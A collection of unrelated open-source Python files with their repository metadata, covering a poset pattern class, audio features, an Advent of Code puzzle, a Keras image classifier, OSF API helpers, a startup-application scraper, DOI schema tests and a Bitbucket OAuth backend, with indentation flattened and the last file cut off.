# Find final occurrence of each variable in poset
latest_event = {}
label = {}
for i, event in enumerate(events):
variable = network.index(event[0])
if (variable not in latest_event) or self.poset_.compare(latest_event[variable], i):
latest_event[variable] = i
label[variable] = 2 ** (variable + network.size()) if event[1].lower() == "min" else 2 ** variable
final_label = 0
for variable in range(0,network.size()):
if variable not in latest_event:
raise ValueError('Not every variable has an event. Currently the code is limited to this case, so this raises an error. TODO: generalize')
final_label += label[variable]
events_for_pattern = [network.index(event[0]) for event in events]
# Create "Pattern" object instance
super(PosetOfExtrema, self).__init__(self.poset_, events_for_pattern, final_label, self.network_.size())
def graphviz(self):
"""
Return graphviz string for visualization
"""
N = len(self.labels_)
gv_vertices = [ '"' + str(i) + '" [label="' + self.labels_[i] + '"];' for i in range(0,N) ]
gv_edges = [ '"' + str(u) + '" -> "' + str(v) + '";' for u in range(0,N) for v in self.poset_.children(u) ]
return 'digraph {\n' + '\n'.join(gv_vertices) + '\n' + '\n'.join(gv_edges) + '\n}\n'
|
shaunharker/DSGRN
|
src/DSGRN/Query/PosetOfExtrema.py
|
Python
|
mit
| 2,236
|
import argparse
import mir3.data.feature_track as track
import mir3.data.spectrogram as spectrogram
import mir3.lib.mir.features as feats
import mir3.module
import copy
class LowEnergy(mir3.module.Module):
"""Calculate the Low Energy feature"""
def get_help(self):
return """Low energy feature for each texture window of a spectrogram"""
def build_arguments(self, parser):
parser.add_argument('-A','--texture-length', type=int, default=40, help="""size of texture window, in analysis windows (frames) (default: %(default)s)""")
parser.add_argument('infile', type=argparse.FileType('rb'),
help="""spectrogram file""")
parser.add_argument('outfile', type=argparse.FileType('wb'),
help="""output track file""")
def calc_track(self, spectrum, texture_length):
return self.calc_track_band(spectrum,
texture_length,
spectrum.freq_bin(spectrum.metadata.min_freq),
spectrum.freq_bin(spectrum.metadata.max_freq))
def calc_track_band(self, spectrum, texture_length, min_freq_bin, max_freq_bin):
t = track.FeatureTrack()
t.data = feats.low_energy(spectrum.data[min_freq_bin:max_freq_bin], texture_length)
t.metadata.sampling_configuration = spectrum.metadata.sampling_configuration
t.metadata.feature = "LowEnergy_" + str(min_freq_bin) + "_" +\
str(max_freq_bin)
t.metadata.filename = spectrum.metadata.input.name
t.metadata.input_metadata = copy.deepcopy(spectrum.metadata)
return t
def run(self, args):
s = spectrogram.Spectrogram().load(args.infile)
t = self.calc_track(s, args.texture_length)
#print s.data.shape
# t = track.FeatureTrack()
# t.data = feats.low_energy(s.data/s.metadata.sampling_configuration.dft_length, args.texture_length)
#
# t.metadata.sampling_configuration = s.metadata.sampling_configuration
# t.metadata.feature = "LowEnergy"
# t.metadata.filename = s.metadata.input.name
t.save(args.outfile)
|
pymir3/pymir3
|
mir3/modules/features/low_energy.py
|
Python
|
mit
| 2,201
|
#!/usr/bin/env python3
"""
http://adventofcode.com/day/17
Part 1
------
The elves bought too much eggnog again - 150 liters this time. To
fit it all into your refrigerator, you'll need to move it into
smaller containers. You take an inventory of the capacities of
the available containers.
For example, suppose you have containers of size 20, 15, 10, 5,
and 5 liters. If you need to store 25 liters, there are four ways
to do it:
- 15 and 10
- 20 and 5 (the first 5)
- 20 and 5 (the second 5)
- 15, 5, and 5
Filling all containers entirely, how many different combinations
of containers can exactly fit all 150 liters of eggnog?
Part 2
------
While playing with all the containers in the kitchen, another load
of eggnog arrives! The shipping and receiving department is
requesting as many containers as you can spare.
Find the minimum number of containers that can exactly fit all
150 liters of eggnog. How many different ways can you fill that
number of containers and still hold exactly 150 litres?
In the example above, the minimum number of containers was two.
There were three ways to use that many containers, and so the
answer there would be 3.
"""
from __future__ import print_function, unicode_literals
from itertools import combinations
import os
import re
import sys
INFILE = 'inputs/input17.txt'
def main():
containers = list()
with open(INFILE) as f:
for line in f:
containers.append(int(line.strip()))
# Part 1
p1count = 0
for s in range(len(containers)):
for c in combinations(containers, s):
if sum(c) == 150:
p1count += 1
# Part 2
p2sizes = dict()
p2min = len(containers)
for i in range(p2min):
p2sizes[i] = 0
for s in range(len(containers)):
for c in combinations(containers, s):
if sum(c) == 150:
if len(c) < p2min:
p2min = len(c)
p2sizes[s] += 1
msg = '[Python] Puzzle 17-1: {}'
print(msg.format(p1count))
msg = '[Python] Puzzle 17-2: {}'
print(msg.format(p2sizes[p2min]))
if __name__ == '__main__':
main()
|
rnelson/adventofcode
|
advent2015/day17.py
|
Python
|
mit
| 2,152
|
from keras.models import Sequential
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.normalization import BatchNormalization
from keras.models import Model
from keras.layers import Input, Dense, merge
from keras.applications.resnet50 import ResNet50
import numpy as np
class Detector(object):
def __init__(self, img_shape, n_dense):
'''Initializes the detector network:
-----------
img_shape: tuple
A tuple denoting the image shape that the network is trained on. Should be of the form (height,width,channels)
n_dense: int
Number of units in the dense layers that are put on top of the pre trained ResNet.
Returns:
--------
Initialized detector network.
'''
self.model = self.get_pre_resnet(img_shape, n_dense)
def get_pre_resnet(self, input_shape, n_dense):
'''Loads the pretrained Keras ResNet, adds 2 trainable dense layers and returns the compiled graph:
-----------
input_shape: tuple
A tuple denoting the image shape that the network is trained on. Should be of the form (height,width,channels)
n_dense: int
Number of units in the dense layers that are put on top of the pre trained ResNet.
Returns:
--------
Compiled detector network.
'''
base_model = ResNet50(include_top=False, weights='imagenet', input_tensor=None, input_shape=input_shape)
x = base_model.output
f_1 = Flatten()(x)
n1 = BatchNormalization()(f_1)
fc1 = Dense(n_dense)(n1)
r1 = Activation('relu')(fc1)
n2 = BatchNormalization()(r1)
fc2 = Dense(n_dense)(n2)
r2 = Activation('relu')(fc2)
n3 = BatchNormalization()(r2)
fc3 = Dense(2)(n3)
final = Activation('softmax')(fc3)
res_net = Model(input=base_model.input, output=final)
for layer in base_model.layers:
layer.trainable = False
res_net.compile(optimizer='adam', loss='categorical_crossentropy',
metrics=['accuracy'])
return res_net
def train_on_batch(self, X,Y):
'''Same method as in the Keras API:
-----------
X: np.array
Numpy array containing the training data of shape (n_samples, height, width, channels)
Y: np.array
Corresponding labels for the training data.
Returns:
--------
None
'''
self.model.train_on_batch(X.astype(np.float32), Y)
def predict(self, X):
'''Returns rounded predictions on the given data:
-----------
X: np.array
Numpy array containing the data of shape (n_samples, height, width, channels)
Returns:
--------
Prediction: np.array
Numpy array containing the predictions with either 1 or 0
'''
return np.round(self.model.predict(X)[:,1])
def save_weights(self, path):
'''Same method as in the Keras API:
-----------
path: str
Filename of the model to be saved
Returns:
--------
None
'''
self.model.save_weights(path)
def load_weights(self, path):
'''Same method as in the Keras API:
-----------
path: str
Filename of the model to be loaded
Returns:
--------
None
'''
self.model.load_weights(path)
|
GodelBose/NSFW_Detection
|
detector.py
|
Python
|
mit
| 3,477
|
#!/usr/bin/env python
from thug.DOM.JSClass import JSClass
class NodeList(JSClass):
def __init__(self, doc, nodes):
self.doc = doc
self.nodes = nodes
def __len__(self):
return self.length
def __getitem__(self, key):
return self.item(int(key))
def item(self, index):
from thug.DOM.W3C.DOMImplementation import DOMImplementation
return DOMImplementation.createHTMLElement(self.doc, self.nodes[index]) if 0 <= index and index < len(self.nodes) else None
@property
def length(self):
return len(self.nodes)
|
tweemeterjop/thug
|
thug/DOM/W3C/NodeList.py
|
Python
|
gpl-2.0
| 589
|
# -*- coding: utf-8 -*-
import urllib
import urlparse
import furl
from django.core.exceptions import ObjectDoesNotExist
from django.db.models import Q
from rest_framework.exceptions import NotFound
from rest_framework.reverse import reverse
from api.base.authentication.drf import get_session_from_cookie
from api.base.exceptions import Gone, UserGone
from framework.auth import Auth
from framework.auth.cas import CasResponse
from framework.auth.oauth_scopes import ComposedScopes, normalize_scopes
from osf.models import OSFUser, Node, Registration
from osf.models.base import GuidMixin
from osf.modm_compat import to_django_query
from osf.utils.requests import check_select_for_update
from website import settings as website_settings
from website import util as website_util # noqa
# These values are copied from rest_framework.fields.BooleanField
# BooleanField cannot be imported here without raising an
# ImproperlyConfigured error
TRUTHY = set(('t', 'T', 'true', 'True', 'TRUE', '1', 1, True, 'on', 'ON', 'On', 'y', 'Y', 'YES', 'yes'))
FALSY = set(('f', 'F', 'false', 'False', 'FALSE', '0', 0, 0.0, False, 'off', 'OFF', 'Off', 'n', 'N', 'NO', 'no'))
UPDATE_METHODS = ['PUT', 'PATCH']
def decompose_field(field):
from api.base.serializers import (
HideIfWithdrawal, HideIfRegistration,
HideIfDisabled, AllowMissing
)
WRAPPER_FIELDS = (HideIfWithdrawal, HideIfRegistration, HideIfDisabled, AllowMissing)
while isinstance(field, WRAPPER_FIELDS):
try:
field = getattr(field, 'field')
except AttributeError:
break
return field
def is_bulk_request(request):
"""
Returns True if bulk request. Can be called as early as the parser.
"""
content_type = request.content_type
return 'ext=bulk' in content_type
def is_truthy(value):
return value in TRUTHY
def is_falsy(value):
return value in FALSY
def get_user_auth(request):
"""Given a Django request object, return an ``Auth`` object with the
authenticated user attached to it.
"""
user = request.user
private_key = request.query_params.get('view_only', None)
if user.is_anonymous:
auth = Auth(None, private_key=private_key)
else:
auth = Auth(user, private_key=private_key)
return auth
def absolute_reverse(view_name, query_kwargs=None, args=None, kwargs=None):
"""Like django's `reverse`, except returns an absolute URL. Also add query parameters."""
relative_url = reverse(view_name, kwargs=kwargs)
url = website_util.api_v2_url(relative_url, params=query_kwargs, base_prefix='')
return url
def get_object_or_error(model_cls, query_or_pk, request, display_name=None):
obj = query = None
select_for_update = check_select_for_update(request)
if isinstance(query_or_pk, basestring):
# they passed a 5-char guid as a string
if issubclass(model_cls, GuidMixin):
# if it's a subclass of GuidMixin we know it's primary_identifier_name
query = {'guids___id': query_or_pk}
else:
if hasattr(model_cls, 'primary_identifier_name'):
# primary_identifier_name gives us the natural key for the model
query = {model_cls.primary_identifier_name: query_or_pk}
else:
# fall back to modmcompatiblity's load method since we don't know their PIN
obj = model_cls.load(query_or_pk, select_for_update=select_for_update)
else:
# they passed a query
if hasattr(model_cls, 'primary_identifier_name'):
query = to_django_query(query_or_pk, model_cls=model_cls)
else:
# fall back to modmcompatibility's find_one
obj = model_cls.find_one(query_or_pk, select_for_update=select_for_update)
if not obj:
if not query:
# if we don't have a query or an object throw 404
raise NotFound
try:
# TODO This could be added onto with eager on the queryset and the embedded fields of the api
if isinstance(query, dict):
obj = model_cls.objects.get(**query) if not select_for_update else model_cls.objects.filter(**query).select_for_update().get()
else:
obj = model_cls.objects.get(query) if not select_for_update else model_cls.objects.filter(query).select_for_update().get()
except ObjectDoesNotExist:
raise NotFound
# For objects that have been disabled (is_active is False), return a 410.
# The User model is an exception because we still want to allow
# users who are unconfirmed or unregistered, but not users who have been
# disabled.
if model_cls is OSFUser and obj.is_disabled:
raise UserGone(user=obj)
elif model_cls is not OSFUser and not getattr(obj, 'is_active', True) or getattr(obj, 'is_deleted', False):
if display_name is None:
raise Gone
else:
raise Gone(detail='The requested {name} is no longer available.'.format(name=display_name))
return obj
def waterbutler_url_for(request_type, provider, path, node_id, token, obj_args=None, **query):
"""Reverse URL lookup for WaterButler routes
:param str request_type: data or metadata
:param str provider: The name of the requested provider
:param str path: The path of the requested file or folder
:param str node_id: The id of the node being accessed
:param str token: The cookie to be used or None
:param dict **query: Addition query parameters to be appended
"""
url = furl.furl(website_settings.WATERBUTLER_URL)
url.path.segments.append(request_type)
url.args.update({
'path': path,
'nid': node_id,
'provider': provider,
})
if token is not None:
url.args['cookie'] = token
if 'view_only' in obj_args:
url.args['view_only'] = obj_args['view_only']
url.args.update(query)
return url.url
def default_node_list_queryset():
return Node.objects.filter(is_deleted=False)
def default_node_permission_queryset(user):
if user.is_anonymous:
return Node.objects.filter(is_public=True)
return Node.objects.filter(Q(is_public=True) | Q(contributor__user_id=user.pk))
def default_registration_list_queryset():
return Registration.objects.filter(is_deleted=False)
def default_registration_permission_queryset(user):
if user.is_anonymous:
return Registration.objects.filter(is_public=True)
return Registration.objects.filter(Q(is_public=True) | Q(contributor__user_id=user.pk))
def extend_querystring_params(url, params):
scheme, netloc, path, query, _ = urlparse.urlsplit(url)
orig_params = urlparse.parse_qs(query)
orig_params.update(params)
query = urllib.urlencode(orig_params, True)
return urlparse.urlunsplit([scheme, netloc, path, query, ''])
def extend_querystring_if_key_exists(url, request, key):
if key in request.query_params.keys():
return extend_querystring_params(url, {key: request.query_params.get(key)})
return url
def has_admin_scope(request):
""" Helper function to determine if a request should be treated
as though it has the `osf.admin` scope. This includes both
tokened requests that do, and requests that are made via the
OSF (i.e. have an osf cookie)
"""
cookie = request.COOKIES.get(website_settings.COOKIE_NAME)
if cookie:
return bool(get_session_from_cookie(cookie))
token = request.auth
if token is None or not isinstance(token, CasResponse):
return False
return set(ComposedScopes.ADMIN_LEVEL).issubset(normalize_scopes(token.attributes['accessTokenScope']))
def is_deprecated(request_version, min_version, max_version):
if request_version < min_version or request_version > max_version:
return True
return False
|
aaxelb/osf.io
|
api/base/utils.py
|
Python
|
apache-2.0
| 7,885
|
import supriya.commands
import supriya.realtime
from supriya.system.SupriyaValueObject import SupriyaValueObject
class NodeTransition(SupriyaValueObject):
"""
A non-realtime state transition.
"""
### CLASS VARIABLES ###
__documentation_section__ = "Session Internals"
__slots__ = ("_source", "_target", "_action")
### INITIALIZER ###
def __init__(self, source=None, action=None, target=None):
if action is not None:
action = supriya.AddAction.from_expr(action)
assert isinstance(action, supriya.AddAction)
assert source is not target
if action is None:
assert source is not None
assert target is None
self._action = action
self._source = source
self._target = target
### PRIVATE METHODS ###
def _free_node(self, nodes_to_children, nodes_to_parents):
node = self.source
for child in nodes_to_children.get(node, ()) or ():
self.free_node(child, nodes_to_children, nodes_to_parents)
parent = nodes_to_parents.get(node, None)
if node in nodes_to_children:
del nodes_to_children[node]
if node in nodes_to_parents:
del nodes_to_parents[node]
if not parent:
return
children = list(nodes_to_children[parent])
children.remove(node)
nodes_to_children[parent] = tuple(children) or None
def _move_node(self, nodes_to_children, nodes_to_parents):
assert self.target in nodes_to_children
if self.source not in nodes_to_children:
nodes_to_children[self.source] = None
old_parent = nodes_to_parents.get(self.source, None)
if old_parent:
children = list(nodes_to_children[old_parent])
children.remove(self.source)
nodes_to_children[old_parent] = tuple(children) or None
if self.action in (supriya.AddAction.ADD_AFTER, supriya.AddAction.ADD_BEFORE):
new_parent = nodes_to_parents[self.target]
else:
new_parent = self.target
nodes_to_parents[self.source] = new_parent
children = list(nodes_to_children.get(new_parent, None) or ())
if self.action == supriya.AddAction.ADD_TO_HEAD:
children.insert(0, self.source)
elif self.action == supriya.AddAction.ADD_TO_TAIL:
children.append(self.source)
elif self.action == supriya.AddAction.ADD_BEFORE:
index = children.index(self.target)
children.insert(index, self.source)
elif self.action == supriya.AddAction.ADD_AFTER:
index = children.index(self.target) + 1
children.insert(index, self.source)
nodes_to_children[new_parent] = tuple(children) or None
def _to_request(self, id_mapping):
node_id_pair = (id_mapping[self.source], id_mapping[self.target])
if self.action == supriya.AddAction.ADD_TO_HEAD:
request_class = supriya.commands.GroupHeadRequest
elif self.action == supriya.AddAction.ADD_TO_TAIL:
request_class = supriya.commands.GroupTailRequest
elif self.action == supriya.AddAction.ADD_BEFORE:
request_class = supriya.commands.NodeBeforeRequest
elif self.action == supriya.AddAction.ADD_AFTER:
request_class = supriya.commands.NodeAfterRequest
request = request_class(node_id_pairs=[node_id_pair])
return request
### PUBLIC METHODS ###
def apply_transform(self, nodes_to_children, nodes_to_parents):
if self.action is None:
self._free_node(nodes_to_children, nodes_to_parents)
else:
self._move_node(nodes_to_children, nodes_to_parents)
@classmethod
def free_node(cls, node, nodes_to_children, nodes_to_parents):
action = cls(source=node)
action.apply_transform(nodes_to_children, nodes_to_parents)
### PUBLIC PROPERTIES ###
@property
def action(self):
return self._action
@property
def source(self):
return self._source
@property
def target(self):
return self._target
|
Pulgama/supriya
|
supriya/nonrealtime/NodeTransition.py
|
Python
|
mit
| 4,163
|
"""
Copyright 2016 (c) Rakshak Talwar
Released under the Apache 2 License
"""
import json, pdb, re, time
import HTMLParser
import sqlite3 as sql
import requests
import gspread
from oauth2client.client import SignedJwtAssertionCredentials
### global variables ###
hparse = HTMLParser.HTMLParser()
### gather authentication information ###
auth_file_location = 'auth_info.txt'
auth_ls = []
with open(auth_file_location, 'r') as auth_file:
auth_ls = [item.strip() for item in auth_file.readlines()]
auth_file.close()
# define global variables for authentication
F6S_KEY = auth_ls[0]
class F6S():
"""Defines object to pull data from F6S API"""
def __init__(self):
self.api_key = F6S_KEY
self.request_url = 'https://api.f6s.com/hatchpitchsxsw2016/applications'
# define the field names for the json responses and sql table, field names correspond 1 to 1
self.sql_fields = [
"StartedOn",
"SubmittedOn",
"CompanyTeam",
"City",
"Country",
"IndustrySector",
"ContactFirstName",
"ContactLastName",
"ContactEmail",
"ContactPhone",
"Employees",
"FoundersandExecs",
"InvestorsEquity",
"ProductLaunch",
"Grapevine",
"Accelerators",
"Pitching",
"Availability",
"Agreement",
"AppStatus"
]
self.json_fields = [
"date_created",
"date_finalized",
"name",
["location", "city"],
["location", "country"],
["questions", 0, "field_response", '*'],
["questions", 4, "question_response"],
["questions", 5, "question_response"],
["questions", 6, "question_response"],
["questions", 7, "question_response"],
["questions", 3, "question_response"],
["members", '*', "name"],
["questions", 2, "question_response"],
["questions", 1, "field_response"],
["questions", 8, "question_response"],
["questions", 9, "question_response"],
["questions", 10, "question_response"],
["questions", 11, "field_response", '*'],
["questions", 12, "field_response", '*'],
"status"
]
def grab_data(self):
"""Pulls all relevant data from F6S REST API. Returns a dict
with fields: data and fields (see save method under DBHandler class)"""
self.all_data = [] # list stores JSON objects of all companies' data
page = 1
while page:
# pull JSON object
payload = {'page' : page, 'api_key' : self.api_key}
r = requests.get(self.request_url, params=payload)
j = r.json() # create JSON object from response
# extend all_data with data in this json response if the data exists
if 'data' in j: # check to see if data is present in most recent request
self.all_data.extend(j['data'])
page += 1 # increment page variable to pick up new data on next run
time.sleep(0.02) # wait for a bit before submitting next request
else: # if no data exists, exit this loop
page = False
return {'data' : self._piece_extractor(self.all_data), 'fields' : self.sql_fields}
def _piece_extractor(self, j_objects):
"""Extracts the SQL tables corresponding piece of information from a
dict representing a single company. Returns a list of dicts
where the field names correspond with the needed field names for the SQL table"""
self.cleaned_objs = [] # a list of cleaned JSON objects to be returned
# go through each object from the F6S API calls and create semi-copies with relevant and corresponding fields
for j_object in j_objects:
# create a temporary object, will be appended to the cleaned_objs list
temp_obj = {}
# fill up the temp_obj with the relevant information
for index, sql_field in enumerate(self.sql_fields):
# handle the different types of nested data sequences
if isinstance(self.json_fields[index], str): # if the field is directly present, no nesting
temp_obj[sql_field] = j_object[self.json_fields[index]]
elif isinstance(self.json_fields[index], list): # handles nested cases
nest_list = self.json_fields[index] # for brevity's sake
if len(nest_list) == 2:
temp_obj[sql_field] = j_object[nest_list[0]][nest_list[1]]
elif len(nest_list) == 3:
# note there are two types of nest_list of length 3, we need to handle them seperately
if isinstance(nest_list[1], int): # the first type is where item at index 1 is an integer
temp_obj[sql_field] = hparse.unescape(j_object[nest_list[0]][nest_list[1]][nest_list[2]])
elif nest_list[1] == '*': # the second type is where item at index 1 is an asterisk (*)
# in this case we need to cycle through the list given after we pull it from j_object.
# then we join all of the values given in the field from nest_list[2]
str_to_return = ''
for item in j_object[nest_list[0]]:
str_to_return = str_to_return + ', ' + item[nest_list[2]]
temp_obj[sql_field] = str_to_return.encode('ascii', 'ignore')
elif len(nest_list) == 4:
str_to_return = ''
if isinstance(j_object[nest_list[0]][nest_list[1]][nest_list[2]], list):
for item in j_object[nest_list[0]][nest_list[1]][nest_list[2]]:
str_to_return = item + ', ' + str_to_return
elif isinstance(j_object[nest_list[0]][nest_list[1]][nest_list[2]], str):
str_to_return = j_object[nest_list[0]][nest_list[1]][nest_list[2]].encode('ascii', 'ignore')
temp_obj[sql_field] = str_to_return
# add the cleaned object
self.cleaned_objs.append(temp_obj)
return self.cleaned_objs
class GS():
"""Defines object to pull data from gspread API"""
def __init__(self):
# initialize the client which will communicate with the Google Spreadsheet
json_key = json.load(open('client_secret.json'))
scope = ['https://spreadsheets.google.com/feeds']
credentials = SignedJwtAssertionCredentials(json_key['client_email'], json_key['private_key'], scope)
self.client = gspread.authorize(credentials)
# define the field names for the sql table
self.sql_fields = [
"SubmittedOn",
"Company",
"ShortDescription",
"City",
"StateProvince",
"Country",
"IndustrySector",
"CompanyWebsite",
"CompanySocial",
"ContactFirstName",
"ContactLastName",
"ContactEmail",
"ContactPhone",
"Employees",
"FoundersandExecs",
"Revenue",
"CurrentInvestment",
"Investors",
"Funding",
"Launch",
"Grapevine",
"Accelerators",
"Pitching",
"Availability",
"Agreement"
]
def grab_data(self, spreadsheet_key='1TgYK4D209oPrmv18-XVodH40JjvU69Xhkfjau3DlQxg', worksheet_name='Sheet1'):
# open the respective worksheet within the Google Spreadsheet
self.spreadsheet = self.client.open_by_key(spreadsheet_key)
self.worksheet = self.spreadsheet.worksheet(worksheet_name)
# grab all data present within the worksheet, not including headers
all_data = self.worksheet.get_all_values()[1:]
return {'data' : all_data, 'fields' : self.sql_fields}
class DBHandler():
"""Defines object which handles saving data into the sqlite db"""
def __init__(self, db_path='db/HATCHscreening.db'):
# create connection to sqlite database to make cursor object
self.db_path = db_path
self.connection = sql.connect(self.db_path)
self.cursor = self.connection.cursor()
def save(self, table_name, doc):
"""Saves a dict with fields: [data, fields]
Where data is a list of dicts, and fields is a list of fields which corresponds
with the field names in the respective table"""
try:
# create a new connection to sqlite database to make cursor object
self.connection = sql.connect(self.db_path)
self.cursor = self.connection.cursor()
if table_name == 'F_Application':
self.cursor.executescript("""
DROP TABLE IF EXISTS {0};
CREATE TABLE {0}(StartedOn DateTime,
SubmittedOn DateTime,
CompanyTeam TEXT,
City TEXT,
Country TEXT,
IndustrySector TEXT,
ContactFirstName TEXT,
ContactLastName TEXT,
ContactEmail TEXT,
ContactPhone TEXT,
Employees INTEGER,
FoundersandExecs TEXT,
InvestorsEquity TEXT,
ProductLaunch TEXT,
Grapevine TEXT,
Accelerators TEXT,
Pitching TEXT,
Availability TEXT,
Agreement TEXT,
AppStatus TEXT);
""".format(table_name))
self._complete_all_insertions(table_name, doc)
elif table_name == 'H_Application':
self.cursor.executescript("""
DROP TABLE IF EXISTS {0};
CREATE TABLE {0}(SubmittedOn DateTime,
Company Text,
ShortDescription Text,
City Text,
StateProvince Text,
Country Text,
IndustrySector Text,
CompanyWebsite Text,
CompanySocial Text,
ContactFirstName Text,
ContactLastName Text,
ContactEmail Text,
ContactPhone Text,
Employees INTEGER DEFAULT 0,
FoundersandExecs Text,
Revenue REAL,
CurrentInvestment REAL DEFAULT 0,
Investors Text,
Funding Text,
Launch DateTime,
Grapevine Text,
Accelerators Text,
Pitching Text,
Availability Text,
Agreement Text);
""".format(table_name))
self._complete_all_insertions(table_name, doc)
self.connection.commit()
except Exception as e:
if self.connection:
self.connection.rollback()
raise e
finally:
if self.connection:
self.connection.close()
def _complete_all_insertions(self, table_name, doc):
"""Returns a list with all insertion commands to be used
Accepts the data returned by grab_data method"""
# fill the insertion_string with contents
for item in doc['data']:
vals = []
if table_name == 'F_Application':
for key in doc['fields']:
vals.append(item[key])
elif table_name == 'H_Application':
vals.extend(item)
placeholders = "({0})".format(len(vals) * '?, ') # generate SQL friendly placeholders string
placeholders = placeholders[:-3] + ')' # remove the trailing comma
sql_command = "INSERT INTO {0} VALUES {1}".format(table_name, placeholders)
self.cursor.execute(sql_command, vals) # interpolate values into SQL command
|
RakshakTalwar/hatchpitchpull
|
hatchpitchpull/hatchpitchpull.py
|
Python
|
apache-2.0
| 12,244
|
# -*- coding: utf-8 -*-
#
# This file is part of INSPIRE.
# Copyright (C) 2014-2018 CERN.
#
# INSPIRE is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# INSPIRE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with INSPIRE. If not, see <http://www.gnu.org/licenses/>.
#
# In applying this license, CERN does not waive the privileges and immunities
# granted to it by virtue of its status as an Intergovernmental Organization
# or submit itself to any jurisdiction.
from __future__ import absolute_import, division, print_function
import json
from inspirehep.modules.records.serializers.schemas.json.literature.common import DOISchemaV1
from marshmallow import Schema, fields
def test_returns_value_and_material_for_doi():
schema = DOISchemaV1()
dump = {
'source': 'arXiv',
'value': '10.1016/j.nuclphysb.2017.05.003',
'material': 'publication',
}
expected = {
'value': '10.1016/j.nuclphysb.2017.05.003',
'material': 'publication',
}
result = schema.dumps(dump).data
assert expected == json.loads(result)
def test_same_doi_value_from_different_source_is_ignored():
class TestSchema(Schema):
dois = fields.Nested(
DOISchemaV1, dump_only=True, many=True)
schema = TestSchema()
dump = {
'dois': [
{
'value': '10.1016/j.nuclphysb.2017.05.003'
},
{
'value': '10.1016/j.nuclphysb.2017.05.003',
},
{
'value': '10.1093/mnras/sty2213',
},
],
}
expected = {
'dois': [
{
'value': '10.1016/j.nuclphysb.2017.05.003'
},
{
'value': '10.1093/mnras/sty2213',
},
],
}
result = schema.dumps(dump).data
assert expected == json.loads(result)
|
inspirehep/inspire-next
|
tests/unit/records/serializers/literature/common/test_doi.py
|
Python
|
gpl-3.0
| 2,323
|
# -*- coding: utf-8 -*-
import time, sched, urllib2, json
from devsup.db import IOScanListBlock
from devsup.hooks import initHook
from devsup.util import StoppableThread
class BPLReport(object):
reports = {}
def __init__(self, name, url, period):
self.name = name
self.url, self.period = url, period
self.result = None
self.reports[name] = self
self.scan = IOScanListBlock()
def fail(self):
self.result = None
def process(self):
self.result = None
R = urllib2.urlopen(self.url, timeout=3)
try:
if R.getcode()!=200:
print 'Fail',R.getcode(), self.url
self.result = None
return
self.result = json.load(R)
except:
print 'Error fetching',self.url
import traceback
traceback.print_exc()
finally:
R.close()
self.result_time = time.time()
self.scan.interrupt(reason = self.result)
add = BPLReport
class ReportRunner(StoppableThread):
class _Done(Exception):
pass
def _sleep(self, time):
if not self.sleep(time):
raise self._Done()
def _proc(self, R):
self._S.enter(R.period, 0, self._proc, (R,))
try:
R.process()
except:
print 'Error in processing',R.url
import traceback
traceback.print_exc()
R.fail()
def run(self):
self._S = S = sched.scheduler(time.time, self._sleep)
for R in BPLReport.reports.itervalues():
S.enter(0, 0, self._proc, (R,))
try:
S.run()
except self._Done:
print 'BPL worker exit'
except:
print 'Error in scheduler'
import traceback
traceback.print_exc()
_worker = ReportRunner()
@initHook("AfterIocRunning")
def _startWorker():
_worker.start()
print 'BPL worker started'
@initHook("AtIocExit")
def _stopWorker():
print 'BPL worker stopping'
_worker.join()
print 'BPL worker stopped'
class ReportItem(object):
raw = True
def __init__(self, rec, args):
# "<operation> <report>.<index>.<attribute> "
opname, src = args.split(None,2)[:2]
self.report, self.idx, self.attrib = src.split('.',2)
self.idx = int(self.idx)
self.R = BPLReport.reports[self.report]
self.allowScan = self.R.scan.add
self.process = getattr(self, 'process_'+opname)
def detach(self, rec):
pass
def process_fetch_float(self, rec, reason=None):
R = self.R.result
invalid = True
if R is not None and len(R)>self.idx:
try:
rec.VAL = float(str(R[self.idx][self.attrib]).translate(None,','))
except KeyError:
pass
else:
invalid = False
rec.UDF = invalid
rec.setTime(self.R.result_time)
def process_fetch_int(self, rec, reason=None):
R = self.R.result
invalid = True
if R is not None and len(R)>self.idx:
try:
rec.VAL = int(R[self.idx][self.attrib])
except KeyError:
pass
else:
invalid = False
rec.UDF = invalid
rec.setTime(self.R.result_time)
def process_fetch_string(self, rec, reason=None):
R = self.R.result
invalid = True
if R is not None and len(R)>self.idx:
try:
rec.VAL = R[self.idx][self.attrib].encode('ascii')
except KeyError:
pass
else:
invalid = False
if invalid:
rec.setSevr() # default is INVALID_ALARM
rec.setTime(self.R.result_time)
def process_fetch_length(self, rec, reason=None):
if self.R.result is not None:
rec.VAL = len(self.R.result)
rec.UDF = self.R.result is None
rec.setTime(self.R.result_time)
build = ReportItem
|
mdavidsaver/pyDevSup
|
archApp/bplreport.py
|
Python
|
gpl-2.0
| 4,059
|
"""
Bitbucket OAuth support.
This adds support for Bitbucket OAuth service. An application must
be registered first on Bitbucket and the settings BITBUCKET_CONSUMER_KEY
and BITBUCKET_CONSUMER_SECRET must be defined with the corresponding
values.
By default username, email, token expiration time, first name and last name are
stored in extra_data field, check OAuthBackend class for details on how to
extend it.
"""
from __future__ import absolute_import
import simplejson
from social_auth.backends import ConsumerBasedOAuth, OAuthBackend
from social_auth.utils import dsa_urlopen
# Bitbucket configuration
BITBUCKET_SERVER = 'bitbucket.org/api/1.0'
BITBUCKET_REQUEST_TOKEN_URL = 'https://%s/oauth/request_token' % BITBUCKET_SERVER
BITBUCKET_ACCESS_TOKEN_URL = 'https://%s/oauth/access_token' % BITBUCKET_SERVER
BITBUCKET_AUTHORIZATION_URL = 'https://%s/oauth/authenticate' % BITBUCKET_SERVER
BITBUCKET_EMAIL_DATA_URL = 'https://%s/emails/' % BITBUCKET_SERVER
BITBUCKET_USER_DATA_URL = 'https://%s/users/' % BITBUCKET_SERVER
class BitbucketBackend(OAuthBackend):
"""Bitbucket OAuth authentication backend"""
name = 'bitbucket'
EXTRA_DATA = [
('username', 'username'),
('expires', 'expires'),
('email', 'email'),
('first_name', 'first_name'),
('last_name', 'last_name')
]
def get_user_details(self, response):
"""Return user details from Bitbucket account"""
return {'username': response.get('username'),
'email': response.get('email'),
'fullname': ' '.join((response.get('first_name'),
response.get('last_name'))),
'first_name': response.get('first_name'),
'last_name': response.get('last_name')}
def get_user_id(self, details, response):
"""Return the user id, Bitbucket only provides username as a unique
identifier"""
return response['username']
@classmethod
def tokens(cls, instance):
